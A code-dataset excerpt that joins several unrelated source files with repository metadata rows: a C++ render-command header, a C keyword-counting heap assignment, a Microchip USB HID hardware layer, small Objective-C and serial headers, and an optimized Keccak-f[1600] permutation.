auto Materials() const -> SequenceView<std::unique_ptr<Material>>;
auto Textures() const -> SequenceView<std::unique_ptr<Texture>>;
auto Setup(Application& application, std::unique_ptr<Pargon::Renderer>&& renderer) -> RendererInformation;
auto CreateGeometry(GraphicsStorage storage) -> Geometry*;
auto CreateMaterial(GraphicsStorage storage) -> Material*;
auto CreateTexture(GraphicsStorage storage) -> Texture*;
auto GetGeometry(GeometryId id) -> Geometry*;
auto GetMaterial(MaterialId id) -> Material*;
auto GetTexture(TextureId id) -> Texture*;
void DestroyGeometry(GeometryId id);
void DestroyMaterial(MaterialId id);
void DestroyTexture(TextureId id);
void SetColorTarget(TextureId texture, int slot);
void ClearColorTarget(float red, float green, float blue, float alpha);
void SetDepthStencilTarget(TextureId texture);
void ClearDepthStencilTarget(float depthValue, int stencilValue);
void SetClippingRectangle(float x, float y, float width, float height);
void SetMaterial(MaterialId material);
void SetTexture(TextureId texture, int slot);
void SetVertexBuffer(GeometryId geometry, std::size_t vertexSize);
void SetInstanceBuffer(GeometryId geometry, std::size_t instanceSize);
void SetIndexBuffer(GeometryId geometry, std::size_t indexSize);
void SetConstantBuffer(GeometryId geometry, bool vertexAccess, bool fragmentAccess, int start, std::size_t size, int slot);
void Draw(int start, int count);
void Render(int synchronization);
private:
friend class GraphicsResource_;
enum class RenderCommandType
{
SetColorTarget,
SetDepthStencilTarget,
ClearColorTarget,
ClearDepthStencilTarget,
SetClippingRectangle,
SetMaterial,
SetTexture,
SetVertexBuffer,
SetInstanceBuffer,
SetIndexBuffer,
SetConstantBuffer,
Draw
};
struct RenderCommand
{
struct SetColorTarget
{
TextureId Texture;
int Slot;
};
struct ClearColorTarget
{
float R;
float G;
float B;
float A;
};
struct SetDepthStencilTarget
{
TextureId Texture;
};
struct ClearDepthStencilTarget
{
float DepthValue;
int StencilValue;
};
struct SetClippingRectangle
{
float X;
float Y;
float Width;
float Height;
};
struct SetMaterial
{
MaterialId Material;
};
struct SetTexture
{
TextureId Texture;
int Slot;
};
struct SetVertexBuffer
{
GeometryId Geometry;
std::size_t VertexSize;
};
struct SetInstanceBuffer
{
GeometryId Geometry;
std::size_t InstanceSize;
};
struct SetIndexBuffer
{
GeometryId Geometry;
std::size_t IndexSize;
};
struct SetConstantBuffer
{
GeometryId Geometry;
int Start;
std::size_t Size;
int Slot;
bool VertexAccess;
bool FragmentAccess;
};
struct Draw
{
int Start;
int Count;
};
union Data
{
Data() {}
SetColorTarget SetColorTarget;
ClearColorTarget ClearColorTarget;
SetDepthStencilTarget SetDepthStencilTarget;
ClearDepthStencilTarget ClearDepthStencilTarget;
SetClippingRectangle SetClippingRectangle;
SetMaterial SetMaterial;
SetTexture SetTexture;
SetVertexBuffer SetVertexBuffer;
SetInstanceBuffer SetInstanceBuffer;
SetIndexBuffer SetIndexBuffer;
SetConstantBuffer SetConstantBuffer;
Draw Draw;
};
RenderCommandType Type;
Data Data;
};
std::unique_ptr<Pargon::Renderer> _renderer;
std::mutex _resourceGuard;
int _nextGeometryId = 0;
int _nextMaterialId = 0;
int _nextTextureId = 0;
Map<int, std::unique_ptr<Geometry>> _geometries;
Map<int, std::unique_ptr<Material>> _materials;
Map<int, std::unique_ptr<Texture>> _textures;
List<GraphicsResource_*> _pendingUpdates;
List<RenderCommand> _commandQueue;
int _vertexCount = 0;
int _instanceCount = 0;
int _indexCount = 0;
void ExecuteCommand(const RenderCommand::SetColorTarget& command);
void ExecuteCommand(const RenderCommand::ClearColorTarget& command);
void ExecuteCommand(const RenderCommand::SetDepthStencilTarget& command);
void ExecuteCommand(const RenderCommand::ClearDepthStencilTarget& command);
void ExecuteCommand(const RenderCommand::SetClippingRectangle& command);
void ExecuteCommand(const RenderCommand::SetMaterial& command);
void ExecuteCommand(const RenderCommand::SetTexture& command);
void ExecuteCommand(const RenderCommand::SetVertexBuffer& command);
void ExecuteCommand(const RenderCommand::SetInstanceBuffer& command);
void ExecuteCommand(const RenderCommand::SetIndexBuffer& command);
void ExecuteCommand(const RenderCommand::SetConstantBuffer& command);
void ExecuteCommand(const RenderCommand::Draw& command);
};
}
inline
auto Pargon::GraphicsDevice::Renderer() const -> Pargon::Renderer*
{
return _renderer.get();
}
inline
auto Pargon::GraphicsDevice::Geometries() const -> SequenceView<std::unique_ptr<Geometry>>
{
return _geometries.Items();
}
inline
auto Pargon::GraphicsDevice::Materials() const -> SequenceView<std::unique_ptr<Material>>
{
return _materials.Items();
}
inline
auto Pargon::GraphicsDevice::Textures() const -> SequenceView<std::unique_ptr<Texture>>
{
return _textures.Items();
}
| 25.55 | 125 | 0.740052 |
26e203d7b7b8e76ba791a3e6292d76b192f9c2aa | 2,916 | c | C | binomial-heap-hw/node.c | RasimSadikoglu/Binary-Trees | 311d125a083378c89e75f9d2606054f0333b519a | [
"MIT"
] | null | null | null | binomial-heap-hw/node.c | RasimSadikoglu/Binary-Trees | 311d125a083378c89e75f9d2606054f0333b519a | [
"MIT"
] | null | null | null | binomial-heap-hw/node.c | RasimSadikoglu/Binary-Trees | 311d125a083378c89e75f9d2606054f0333b519a | [
"MIT"
] | null | null | null | #include "node.h"
#include <stdlib.h>
#include <dirent.h>
#include <stdio.h>
#include <string.h>
node* node_create(char *file_name, int key) {
node *n = malloc(sizeof(node));
strncpy(n->file_name, file_name, CHAR_LENGTH);
n->key = key;
return n;
}
int is_word_boundry(char c) {
return !((c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z'));
}
int number_of_occurences(char *file_content, char *keyword) {
int keyword_length = strlen(keyword), file_length = strlen(file_content);
if (keyword_length > file_length) return 0;
int occurence_count = 0;
occurence_count += strncmp(file_content, keyword, keyword_length) == 0 && is_word_boundry(file_content[keyword_length]);
int i; for (i = 1; i < file_length - keyword_length; i++) {
occurence_count += strncmp(file_content + i, keyword, keyword_length) == 0 &&
is_word_boundry(file_content[i - 1]) && is_word_boundry(file_content[i + keyword_length]);
}
occurence_count += strncmp(file_content + i, keyword, keyword_length) == 0 && is_word_boundry(file_content[i - 1]);
return occurence_count;
}
node* read_file(char *file_name, char *keyword) {
FILE *input_file = fopen(file_name, "r");
if (input_file == NULL) {
fprintf(stderr, "No file exists. (%s)\n", file_name);
exit(EXIT_FAILURE);
}
fseek(input_file, 0, SEEK_END);
int file_size = ftell(input_file);
rewind(input_file);
char *file_content = malloc(file_size + 1);
fread(file_content, sizeof(char), file_size, input_file);
file_content[file_size] = '\0';
node *n = node_create(file_name, number_of_occurences(file_content, keyword));
fclose(input_file);
free(file_content);
return n;
}
node** node_read_files(char *directory_path, char *keyword) {
struct dirent *file_info;
DIR *directory = opendir(directory_path);
char **file_names = calloc(sizeof(char*), 1);
int current_index = 0;
while ((file_info = readdir(directory))) {
if (file_info->d_type == DT_REG) {
file_names[current_index] = malloc(sizeof(char) * CHAR_LENGTH);
strcpy(file_names[current_index], directory_path);
strncat(file_names[current_index++], file_info->d_name, CHAR_LENGTH - 6);
file_names = realloc(file_names, sizeof(char*) * (current_index + 1));
file_names[current_index] = NULL;
}
}
closedir(directory);
node **nodes = calloc(sizeof(node*), 1);
current_index = 0;
for (char **file_name = file_names; *file_name != NULL; file_name++) {
nodes[current_index++] = read_file(*file_name, keyword);
nodes = realloc(nodes, sizeof(node*) * (current_index + 1));
nodes[current_index] = NULL;
free(*file_name);
}
free(file_names);
return nodes;
} | 27.509434 | 124 | 0.626886 |
6cbfbeb6fbd4ade58510a4d1e32638078780a98e | 11,247 | c | C | vendors/microchip/secure_elements/lib/hal/hal_all_platforms_kit_hidapi.c | nateglims/amazon-freertos | 5cc32eb29d935f124101a3584c6d29aa1f5d687d | [
"MIT"
] | 2,637 | 2017-11-29T18:41:48.000Z | 2022-03-29T01:03:36.000Z | vendors/microchip/secure_elements/lib/hal/hal_all_platforms_kit_hidapi.c | nateglims/amazon-freertos | 5cc32eb29d935f124101a3584c6d29aa1f5d687d | [
"MIT"
] | 1,926 | 2017-11-29T21:42:02.000Z | 2022-03-31T22:12:50.000Z | vendors/microchip/secure_elements/lib/hal/hal_all_platforms_kit_hidapi.c | nateglims/amazon-freertos | 5cc32eb29d935f124101a3584c6d29aa1f5d687d | [
"MIT"
] | 1,384 | 2017-11-29T19:04:27.000Z | 2022-03-29T14:40:27.000Z | /**
* \file
* \brief HAL for kit protocol over HID for any platform.
*
* \copyright (c) 2015-2018 Microchip Technology Inc. and its subsidiaries.
*
* \page License
*
* Subject to your compliance with these terms, you may use Microchip software
* and any derivatives exclusively with Microchip products. It is your
* responsibility to comply with third party license terms applicable to your
* use of third party software (including open source software) that may
* accompany Microchip software.
*
* THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
* EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
* WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
* PARTICULAR PURPOSE. IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT,
* SPECIAL, PUNITIVE, INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE
* OF ANY KIND WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF
* MICROCHIP HAS BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE
* FORESEEABLE. TO THE FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL
* LIABILITY ON ALL CLAIMS IN ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED
* THE AMOUNT OF FEES, IF ANY, THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR
* THIS SOFTWARE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "hidapi.h"
//#include "unistd.h"
//#include <windows.h>
#include "atca_hal.h"
#include "hal_all_platforms_kit_hidapi.h"
#include "hal/kit_protocol.h"
/** \defgroup hal_ Hardware abstraction layer (hal_)
*
* \brief
* These methods define the hardware abstraction layer for communicating with a CryptoAuth device
*
@{ */
// File scope globals
atcahid_t _gHid;
/** \brief discover cdc buses available for this hardware
* this maintains a list of logical to physical bus mappings freeing the application
* of the a-priori knowledge
* \param[in] cdc_buses - an array of logical bus numbers
* \param[in] max_buses - maximum number of buses the app wants to attempt to discover
*/
ATCA_STATUS hal_kit_hid_discover_buses(int i2c_buses[], int max_buses)
{
return ATCA_UNIMPLEMENTED;
}
/** \brief discover any CryptoAuth devices on a given logical bus number
* \param[in] bus_num - logical bus number on which to look for CryptoAuth devices
* \param[out] cfg[] - pointer to head of an array of interface config structures which get filled in by this method
* \param[out] *found - number of devices found on this bus
*/
ATCA_STATUS hal_kit_hid_discover_devices(int bus_num, ATCAIfaceCfg cfg[], int *found)
{
return ATCA_UNIMPLEMENTED;
}
/** \brief HAL implementation of Kit USB HID init
* \param[in] hal pointer to HAL specific data that is maintained by this HAL
* \param[in] cfg pointer to HAL specific configuration data that is used to initialize this HAL
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_init(void* hal, ATCAIfaceCfg* cfg)
{
ATCAHAL_t *phal = (ATCAHAL_t*)hal;
hid_device *handle;
struct hid_device_info *devs = NULL;
struct hid_device_info *cur_dev = NULL;
int i = 0;
int index = 0;
// Check the input variables
if ((cfg == NULL) || (phal == NULL))
{
return ATCA_BAD_PARAM;
}
// Initialize the _gHid structure
memset(&_gHid, 0, sizeof(_gHid));
for (i = 0; i < HID_DEVICES_MAX; i++)
{
_gHid.kits[i] = NULL;
}
_gHid.num_kits_found = 0;
// Create the enumerate object
#ifdef KIT_DEBUG
printf("Enumerate HID device(s)\n");
#endif
hid_init();
devs = hid_enumerate(cfg->atcahid.vid, cfg->atcahid.pid);
cur_dev = devs;
if (cur_dev == NULL)
{
#ifdef KIT_DEBUG
printf("no HID device found\n");
#endif
hid_exit();
return ATCA_COMM_FAIL;
}
while (cur_dev != NULL)
{
if ((handle = hid_open(cur_dev->vendor_id, cur_dev->product_id, cur_dev->serial_number)))
{
_gHid.kits[index] = handle;
#ifdef KIT_DEBUG
printf("Kit USB Device Node: %s\n", cur_dev->path);
printf(" Manufacturer %s (%s)\n",
(char*)cur_dev->manufacturer_string,
(char*)cur_dev->product_string);
printf(" PID %d\n", cur_dev->product_id);
printf(" VID %d\n\n", cur_dev->vendor_id);
#endif
index++;
}
cur_dev = cur_dev->next;
}
hid_free_enumeration(devs);
// Save the results of this discovery of HID
if (index > 0)
{
_gHid.num_kits_found = index;
phal->hal_data = &_gHid;
}
return ATCA_SUCCESS;
}
/** \brief HAL implementation of Kit HID post init
* \param[in] iface instance
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_post_init(ATCAIface iface)
{
ATCA_STATUS status = ATCA_SUCCESS;
atcahid_t* pHid = atgetifacehaldat(iface);
ATCAIfaceCfg *pCfg = atgetifacecfg(iface);
int i = 0;
if ((pHid == NULL) || (pCfg == NULL))
{
return ATCA_BAD_PARAM;
}
// Perform the kit protocol init
for (i = 0; i < pHid->num_kits_found; i++)
{
status = kit_init(iface);
if (status != ATCA_SUCCESS)
#ifdef KIT_DEBUG
{ printf("kit_init() Failed"); }
#endif
{ BREAK(status, "kit_init() failed"); }
}
return status;
}
/** \brief HAL implementation of send over USB HID
* \param[in] iface instance
* \param[in] txdata pointer to bytes to send
* \param[in] txlength number of bytes to send
* \return ATCA_STATUS
*/
ATCA_STATUS kit_phy_send(ATCAIface iface, uint8_t* txdata, int txlength)
{
ATCAIfaceCfg *cfg = atgetifacecfg(iface);
atcahid_t* pHid = (atcahid_t*)atgetifacehaldat(iface);
int bytes_written = 0;
int bytes_left;
int bytes_to_send;
uint8_t buffer[HID_PACKET_MAX];
if ((txdata == NULL) || (cfg == NULL) || (pHid == NULL))
{
return ATCA_BAD_PARAM;
}
if (pHid->kits[cfg->atcahid.idx] == NULL)
{
return ATCA_COMM_FAIL;
}
#ifdef KIT_DEBUG
printf("HID layer: Write: %s", txdata);
#endif
//To avoid ERROR_INVALID_USER_BUFFER on Windows
bytes_left = txlength;
while (bytes_left > 0)
{
memset(buffer, 0, (HID_PACKET_MAX));
if (bytes_left >= cfg->atcahid.packetsize)
{
bytes_to_send = cfg->atcahid.packetsize;
}
else
{
bytes_to_send = bytes_left;
}
memcpy(&buffer[1], &txdata[(txlength - bytes_left)], bytes_to_send);
bytes_written = hid_write(pHid->kits[cfg->atcahid.idx], buffer, cfg->atcahid.packetsize + 1);
if (bytes_written != cfg->atcahid.packetsize + 1)
{
return ATCA_TX_FAIL;
}
bytes_left -= bytes_to_send;
}
return ATCA_SUCCESS;
}
/** \brief HAL implementation of kit protocol send over USB HID
* \param[in] iface instance
* \param[out] rxdata pointer to space to receive the data
* \param[inout] rxsize ptr to expected number of receive bytes to request
* \return ATCA_STATUS
*/
ATCA_STATUS kit_phy_receive(ATCAIface iface, uint8_t* rxdata, int* rxsize)
{
ATCAIfaceCfg *cfg = atgetifacecfg(iface);
atcahid_t* pHid = (atcahid_t*)atgetifacehaldat(iface);
bool continue_read = true;
size_t bytes_read = 0;
size_t total_bytes_read = 0;
size_t bytes_to_read = *rxsize;
char *location;
if ((rxdata == NULL) || (rxsize == NULL) || (cfg == NULL) || (pHid == NULL))
{
return ATCA_BAD_PARAM;
}
if (pHid->kits[cfg->atcahid.idx] == NULL)
{
return ATCA_COMM_FAIL;
}
bytes_to_read--;
//hid_get_product_string(pHid->kits[cfg->atcahid.idx], &rxdata[total_bytes_read], bytes_to_read);
//printf("%s\n", rxdata);
// Receive the data from the kit USB device
do
{
bytes_read = hid_read(pHid->kits[cfg->atcahid.idx], &rxdata[total_bytes_read], bytes_to_read);
if (bytes_read == -1)
{
return ATCA_RX_FAIL;
}
total_bytes_read += bytes_read;
bytes_to_read -= bytes_read;
// Check if the kit protocol message has been received
if (strstr((char*)rxdata, "\n") != NULL)
{
continue_read = false;
}
}
while (continue_read == true);
location = strchr((char*)rxdata, '\n');
// Save the total bytes read
if (location != NULL)
{
*rxsize = (int)(location - (char*)rxdata);
}
else
{
*rxsize = (int)total_bytes_read;
}
#ifdef KIT_DEBUG
printf("HID layer: Read: %s", rxdata);
#endif // KIT_DEBUG
return ATCA_SUCCESS;
}
/** \brief Number of USB HID devices found
* \param[out] num_found
* \return ATCA_STATUS
*/
ATCA_STATUS kit_phy_num_found(int8_t* num_found)
{
*num_found = _gHid.num_kits_found;
return ATCA_SUCCESS;
}
/** \brief HAL implementation of kit protocol send over USB HID
* \param[in] iface instance
* \param[in] txdata pointer to bytes to send
* \param[in] txlength number of bytes to send
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_send(ATCAIface iface, uint8_t* txdata, int txlength)
{
// Call the kit_send() function that will call phy_send() implemented below
return kit_send(iface, txdata, txlength);
}
/** \brief HAL implementation of send over USB HID
* \param[in] iface instance
* \param[in] rxdata pointer to space to receive the data
* \param[inout] rxsize ptr to expected number of receive bytes to request
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_receive(ATCAIface iface, uint8_t* rxdata, uint16_t* rxsize)
{
// Call the kit_receive() function that will call phy_receive() implemented below
return kit_receive(iface, rxdata, rxsize);
}
/** \brief Call the wake for kit protocol
* \param[in] iface ATCAIface instance that is the interface object to send the bytes over
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_wake(ATCAIface iface)
{
// Call the kit_wake() function that will call phy_send() and phy_receive()
return kit_wake(iface);
}
/** \brief Call the idle for kit protocol
* \param[in] iface ATCAIface instance that is the interface object to send the bytes over
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_idle(ATCAIface iface)
{
// Call the kit_idle() function that will call phy_send() and phy_receive()
return kit_idle(iface);
}
/** \brief Call the sleep for kit protocol
* \param[in] iface ATCAIface instance that is the interface object to send the bytes over
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_sleep(ATCAIface iface)
{
// Call the kit_sleep() function that will call phy_send() and phy_receive()
return kit_sleep(iface);
}
/** \brief Close the physical port for HID
* \param[in] hal_data The hardware abstraction data specific to this HAL
* \return ATCA_STATUS
*/
ATCA_STATUS hal_kit_hid_release(void* hal_data)
{
atcahid_t* phaldat = (atcahid_t*)hal_data;
int i = 0;
if (phaldat == NULL)
{
return ATCA_BAD_PARAM;
}
// Close all kit USB devices
for (i = 0; i < phaldat->num_kits_found; i++)
{
if (_gHid.kits[i] != NULL)
{
hid_close(_gHid.kits[i]);
}
}
return ATCA_SUCCESS;
}
/** @} */
| 28.545685 | 116 | 0.660087 |
29d890fa07fc55bd68ac239bf9d04097d939e28c | 77 | h | C | bootloader/src/serial.h | david-cermak/ADuCM-Bootloader | 494cf2ae48d2cc8394658fe46d6564b1990f0a39 | [
"Apache-2.0"
] | 5 | 2019-05-21T03:45:34.000Z | 2021-01-24T13:37:56.000Z | bootloader/src/serial.h | david-cermak/ADuCM-Bootloader | 494cf2ae48d2cc8394658fe46d6564b1990f0a39 | [
"Apache-2.0"
] | null | null | null | bootloader/src/serial.h | david-cermak/ADuCM-Bootloader | 494cf2ae48d2cc8394658fe46d6564b1990f0a39 | [
"Apache-2.0"
] | 1 | 2020-03-12T14:24:00.000Z | 2020-03-12T14:24:00.000Z |
void SerialInit();
void SendString(char* string);
void SendChar(char ch);
| 11 | 30 | 0.727273 |
3b044b8344c8c88ab686130c67e1dda4e00ea814 | 520 | h | C | avFoundation_Speech/avFoundation_Speech/Tools/CLAvSpeechUtils.h | charlyliusir/avFoundation | 577e4d412eab824e099a40dd445b2adc597f3ab8 | [
"MIT"
] | null | null | null | avFoundation_Speech/avFoundation_Speech/Tools/CLAvSpeechUtils.h | charlyliusir/avFoundation | 577e4d412eab824e099a40dd445b2adc597f3ab8 | [
"MIT"
] | null | null | null | avFoundation_Speech/avFoundation_Speech/Tools/CLAvSpeechUtils.h | charlyliusir/avFoundation | 577e4d412eab824e099a40dd445b2adc597f3ab8 | [
"MIT"
] | null | null | null | //
// CLAvSpeechUtils.h
// avFoundation_Speech
//
// Created by tidemedia on 2017/8/15.
// Copyright © 2017年 charly. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <AVFoundation/AVFoundation.h>
#import "CLAvSpeechConfigure.h"
@interface CLAvSpeechUtils : NSObject
/// 解析器
@property (strong, readonly, nonatomic) AVSpeechSynthesizer *speechSynthsizer;
+ (instancetype)avSpeechUtilSharedInstance;
- (void)playSpeechString:(NSString *)string;
- (void)stop;
- (void)pause;
- (void)continue;
@end
| 20.8 | 78 | 0.746154 |
a547bb5a89445696248818a3c25324a4defe9443 | 14,809 | c | C | src/qt/qtbase/src/3rdparty/sha3/KeccakF-1600-opt64.c | viewdy/phantomjs | eddb0db1d253fd0c546060a4555554c8ee08c13c | [
"BSD-3-Clause"
] | 1 | 2020-04-30T15:47:35.000Z | 2020-04-30T15:47:35.000Z | src/qt/qtbase/src/3rdparty/sha3/KeccakF-1600-opt64.c | mrampersad/phantomjs | dca6f77a36699eb4e1c46f7600cca618f01b0ac3 | [
"BSD-3-Clause"
] | null | null | null | src/qt/qtbase/src/3rdparty/sha3/KeccakF-1600-opt64.c | mrampersad/phantomjs | dca6f77a36699eb4e1c46f7600cca618f01b0ac3 | [
"BSD-3-Clause"
] | 1 | 2022-02-18T10:41:38.000Z | 2022-02-18T10:41:38.000Z | /*
The Keccak sponge function, designed by Guido Bertoni, Joan Daemen,
Michaël Peeters and Gilles Van Assche. For more information, feedback or
questions, please refer to our website: http://keccak.noekeon.org/
Implementation by the designers,
hereby denoted as "the implementer".
To the extent possible under law, the implementer has waived all copyright
and related or neighboring rights to the source code in this file.
http://creativecommons.org/publicdomain/zero/1.0/
*/
#include <string.h>
#include "brg_endian.h"
#include "KeccakF-1600-opt64-settings.h"
#include "KeccakF-1600-interface.h"
typedef unsigned char UINT8;
typedef unsigned long long int UINT64;
#if defined(UseSSE) || defined(UseXOP)
#if defined(__GNUC__)
#define ALIGN __attribute__ ((aligned(32)))
#elif defined(_MSC_VER)
#define ALIGN __declspec(align(32))
#endif
#endif
#ifndef ALIGN
# define ALIGN
#endif
#if defined(UseSSE)
#include <x86intrin.h>
typedef __m128i V64;
typedef __m128i V128;
typedef union {
V128 v128;
UINT64 v64[2];
} V6464;
#define ANDnu64(a, b) _mm_andnot_si128(a, b)
#define LOAD64(a) _mm_loadl_epi64((const V64 *)&(a))
#define CONST64(a) _mm_loadl_epi64((const V64 *)&(a))
#define ROL64(a, o) _mm_or_si128(_mm_slli_epi64(a, o), _mm_srli_epi64(a, 64-(o)))
#define STORE64(a, b) _mm_storel_epi64((V64 *)&(a), b)
#define XOR64(a, b) _mm_xor_si128(a, b)
#define XOReq64(a, b) a = _mm_xor_si128(a, b)
#define SHUFFLEBYTES128(a, b) _mm_shuffle_epi8(a, b)
#define ANDnu128(a, b) _mm_andnot_si128(a, b)
#define LOAD6464(a, b) _mm_set_epi64((__m64)(a), (__m64)(b))
#define CONST128(a) _mm_load_si128((const V128 *)&(a))
#define LOAD128(a) _mm_load_si128((const V128 *)&(a))
#define LOAD128u(a) _mm_loadu_si128((const V128 *)&(a))
#define ROL64in128(a, o) _mm_or_si128(_mm_slli_epi64(a, o), _mm_srli_epi64(a, 64-(o)))
#define STORE128(a, b) _mm_store_si128((V128 *)&(a), b)
#define XOR128(a, b) _mm_xor_si128(a, b)
#define XOReq128(a, b) a = _mm_xor_si128(a, b)
#define GET64LOLO(a, b) _mm_unpacklo_epi64(a, b)
#define GET64HIHI(a, b) _mm_unpackhi_epi64(a, b)
#define COPY64HI2LO(a) _mm_shuffle_epi32(a, 0xEE)
#define COPY64LO2HI(a) _mm_shuffle_epi32(a, 0x44)
#define ZERO128() _mm_setzero_si128()
#ifdef UseOnlySIMD64
#include "KeccakF-1600-simd64.macros"
#else
ALIGN const UINT64 rho8_56[2] = {0x0605040302010007, 0x080F0E0D0C0B0A09};
#include "KeccakF-1600-simd128.macros"
#endif
#ifdef UseBebigokimisa
#error "UseBebigokimisa cannot be used in combination with UseSSE"
#endif
#elif defined(UseXOP)
#include <x86intrin.h>
typedef __m128i V64;
typedef __m128i V128;
#define LOAD64(a) _mm_loadl_epi64((const V64 *)&(a))
#define CONST64(a) _mm_loadl_epi64((const V64 *)&(a))
#define STORE64(a, b) _mm_storel_epi64((V64 *)&(a), b)
#define XOR64(a, b) _mm_xor_si128(a, b)
#define XOReq64(a, b) a = _mm_xor_si128(a, b)
#define ANDnu128(a, b) _mm_andnot_si128(a, b)
#define LOAD6464(a, b) _mm_set_epi64((__m64)(a), (__m64)(b))
#define CONST128(a) _mm_load_si128((const V128 *)&(a))
#define LOAD128(a) _mm_load_si128((const V128 *)&(a))
#define LOAD128u(a) _mm_loadu_si128((const V128 *)&(a))
#define STORE128(a, b) _mm_store_si128((V128 *)&(a), b)
#define XOR128(a, b) _mm_xor_si128(a, b)
#define XOReq128(a, b) a = _mm_xor_si128(a, b)
#define ZERO128() _mm_setzero_si128()
#define SWAP64(a) _mm_shuffle_epi32(a, 0x4E)
#define GET64LOLO(a, b) _mm_unpacklo_epi64(a, b)
#define GET64HIHI(a, b) _mm_unpackhi_epi64(a, b)
#define GET64LOHI(a, b) ((__m128i)_mm_blend_pd((__m128d)a, (__m128d)b, 2))
#define GET64HILO(a, b) SWAP64(GET64LOHI(b, a))
#define COPY64HI2LO(a) _mm_shuffle_epi32(a, 0xEE)
#define COPY64LO2HI(a) _mm_shuffle_epi32(a, 0x44)
#define ROL6464same(a, o) _mm_roti_epi64(a, o)
#define ROL6464(a, r1, r2) _mm_rot_epi64(a, CONST128( rot_##r1##_##r2 ))
ALIGN const UINT64 rot_0_20[2] = { 0, 20};
ALIGN const UINT64 rot_44_3[2] = {44, 3};
ALIGN const UINT64 rot_43_45[2] = {43, 45};
ALIGN const UINT64 rot_21_61[2] = {21, 61};
ALIGN const UINT64 rot_14_28[2] = {14, 28};
ALIGN const UINT64 rot_1_36[2] = { 1, 36};
ALIGN const UINT64 rot_6_10[2] = { 6, 10};
ALIGN const UINT64 rot_25_15[2] = {25, 15};
ALIGN const UINT64 rot_8_56[2] = { 8, 56};
ALIGN const UINT64 rot_18_27[2] = {18, 27};
ALIGN const UINT64 rot_62_55[2] = {62, 55};
ALIGN const UINT64 rot_39_41[2] = {39, 41};
#if defined(UseSimulatedXOP)
// For debugging purposes, when XOP is not available
#undef ROL6464
#undef ROL6464same
#define ROL6464same(a, o) _mm_or_si128(_mm_slli_epi64(a, o), _mm_srli_epi64(a, 64-(o)))
V128 ROL6464(V128 a, int r0, int r1)
{
V128 a0 = ROL64(a, r0);
V128 a1 = COPY64HI2LO(ROL64(a, r1));
return GET64LOLO(a0, a1);
}
#endif
#include "KeccakF-1600-xop.macros"
#ifdef UseBebigokimisa
#error "UseBebigokimisa cannot be used in combination with UseXOP"
#endif
#elif defined(UseMMX)
#include <mmintrin.h>
typedef __m64 V64;
#define ANDnu64(a, b) _mm_andnot_si64(a, b)
#if (defined(_MSC_VER) || defined (__INTEL_COMPILER))
#define LOAD64(a) *(V64*)&(a)
#define CONST64(a) *(V64*)&(a)
#define STORE64(a, b) *(V64*)&(a) = b
#else
#define LOAD64(a) (V64)a
#define CONST64(a) (V64)a
#define STORE64(a, b) a = (UINT64)b
#endif
#define ROL64(a, o) _mm_or_si64(_mm_slli_si64(a, o), _mm_srli_si64(a, 64-(o)))
#define XOR64(a, b) _mm_xor_si64(a, b)
#define XOReq64(a, b) a = _mm_xor_si64(a, b)
#include "KeccakF-1600-simd64.macros"
#ifdef UseBebigokimisa
#error "UseBebigokimisa cannot be used in combination with UseMMX"
#endif
#else
#if defined(_MSC_VER)
#define ROL64(a, offset) _rotl64(a, offset)
#elif defined(UseSHLD)
#define ROL64(x,N) ({ \
register UINT64 __out; \
register UINT64 __in = x; \
__asm__ ("shld %2,%0,%0" : "=r"(__out) : "0"(__in), "i"(N)); \
__out; \
})
#else
#define ROL64(a, offset) ((((UINT64)a) << offset) ^ (((UINT64)a) >> (64-offset)))
#endif
#include "KeccakF-1600-64.macros"
#endif
#include "KeccakF-1600-unrolling.macros"
static void KeccakPermutationOnWords(UINT64 *state)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
copyFromState(A, state)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
static void KeccakPermutationOnWordsAfterXoring(UINT64 *state, const UINT64 *input, unsigned int laneCount)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
unsigned int j;
for(j=0; j<laneCount; j++)
state[j] ^= input[j];
copyFromState(A, state)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
#ifdef ProvideFast576
static void KeccakPermutationOnWordsAfterXoring576bits(UINT64 *state, const UINT64 *input)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
copyFromStateAndXor576bits(A, state, input)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
#endif
#ifdef ProvideFast832
static void KeccakPermutationOnWordsAfterXoring832bits(UINT64 *state, const UINT64 *input)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
copyFromStateAndXor832bits(A, state, input)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
#endif
#ifdef ProvideFast1024
static void KeccakPermutationOnWordsAfterXoring1024bits(UINT64 *state, const UINT64 *input)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
copyFromStateAndXor1024bits(A, state, input)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
#endif
#ifdef ProvideFast1088
static void KeccakPermutationOnWordsAfterXoring1088bits(UINT64 *state, const UINT64 *input)
{
declareABCDE
#if (Unrolling != 24)
unsigned int i;
#endif
copyFromStateAndXor1088bits(A, state, input)
rounds
#if defined(UseMMX)
_mm_empty();
#endif
}
#endif
